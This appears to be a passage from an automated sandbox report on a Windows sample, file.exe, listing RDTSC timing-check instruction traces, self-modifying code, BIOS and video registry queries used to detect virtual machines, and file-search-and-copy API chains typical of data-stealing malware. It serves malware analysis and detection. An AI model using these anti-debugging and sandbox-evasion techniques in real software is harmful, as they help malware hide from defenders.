              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E00C2 second address: 12E00FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F6778CEBE46h 0x00000012 jmp 00007F6778CEBE54h 0x00000017 jp 00007F6778CEBE46h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E00FA second address: 12E0124 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jl 00007F67787C0188h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F67787C0193h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0124 second address: 12E0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E47FB second address: 12E4801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203A8A second address: 1203A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94D2 second address: 12E94D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94D7 second address: 12E94E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6778CEBE46h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94E5 second address: 12E94EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9393 second address: 12E939D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EBF48 second address: 12EBF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F67787C0186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EBF54 second address: 12EBF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F40CD second address: 12F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F40D1 second address: 12F40EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE50h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F40EA second address: 12F4109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0199h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2C16 second address: 12F2C50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE58h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6778CEBE56h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2F12 second address: 12F2F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3085 second address: 12F308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F308B second address: 12F3097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3230 second address: 12F3236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3236 second address: 12F323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F323D second address: 12F3243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F33A8 second address: 12F33B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F86E5 second address: 12F871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE59h 0x00000009 jmp 00007F6778CEBE56h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8409 second address: 12F840F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309971 second address: 1309977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097F0 second address: 13097F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BCC8 second address: 132BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BCCC second address: 132BCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BCD0 second address: 132BCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE55h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C502 second address: 132C506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C506 second address: 132C50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C50A second address: 132C510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C510 second address: 132C522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE4Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C522 second address: 132C542 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 jno 00007F67787C018Ch 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F83F second address: 132F844 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F8FE second address: 132F904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F904 second address: 132F918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F6778CEBE46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F918 second address: 132F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F91C second address: 132F932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132FBCA second address: 132FBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330D36 second address: 1330D4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jl 00007F6778CEBE50h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334217 second address: 133421B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133421B second address: 1334251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F6778CEBE46h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F6778CEBE55h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334251 second address: 1334256 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334256 second address: 1334263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F6778CEBE4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0318 second address: 55F032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F03E6 second address: 55F0406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0406 second address: 55F040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F040C second address: 55F0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ah, F2h 0x0000000e pushfd 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 and ch, FFFFFF8Eh 0x00000017 jmp 00007F6778CEBE59h 0x0000001c popfd 0x0000001d popad 0x0000001e mov di, ax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249E27 second address: 1249E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FDE second address: 1249FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FE2 second address: 1249FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FEC second address: 1249FFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F6778CEBE46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FFE second address: 124A008 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 108FA62 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 123D515 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12697D9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 124ED80 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12CD573 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-27376
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26194
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E518A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E53910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E51269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E51250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E5E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E5CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E4DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00E52390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E4DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E54B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E54B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00E5DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E5D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E416A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E416B9
